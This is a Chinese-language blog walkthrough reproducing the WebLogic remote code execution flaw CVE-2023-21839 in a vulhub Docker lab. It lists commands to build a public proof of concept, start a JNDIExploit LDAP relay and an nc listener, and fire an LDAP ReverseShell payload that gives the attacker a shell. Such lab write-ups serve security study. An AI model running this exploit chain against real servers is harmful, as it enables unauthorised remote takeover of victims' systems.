Weblogic远程代码执行漏洞(CVE-2023-21839)排大坑复现成功

11 篇文章 2 订阅
9 篇文章 0 订阅

目录

漏洞概述

漏洞复现

环境搭建

Poc地址

中转工具

过程复现


漏洞概述

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。

Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。

影响范围:

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

漏洞复现

环境搭建

靶机环境搭建

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

放到kali中,进入此目录,docker-compose up -d启动运行。

访问管理地址:

http://xx.xx.xx.xx:7001/console

(查看账密的方法:)

docker-compose logs | grep password

攻击环境搭建

Poc地址

https://github.com/4ra1n/CVE-2023-21839

cd cmd

go build -o CVE-2023-21839

若没安装go,则需要apt-get安装一下(kali可能需要先更新源)

go build -o CVE-2023-21839

编译完是这样

攻击命令:

(-ip和-port为靶机的IP和端口,-ldap里的IP都为攻击IP,前面的端口号是中转工具的默认端口,后面为导出的端口号)

./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892

中转工具

JNDIExploit v1.4地址:

https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx2

(-i为攻击机IP)

过程复现

1、开启中转工具监听

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx2

2、开启nc监听

nc -lvnp 7892

3、发动攻击

./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892

 在发动攻击时,./CVE-2023-21839这里会很快结束连接,然后在nc上会显示已成功获取shell

参考:

https://blog.csdn.net/csdnmmd/article/details/129247272

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值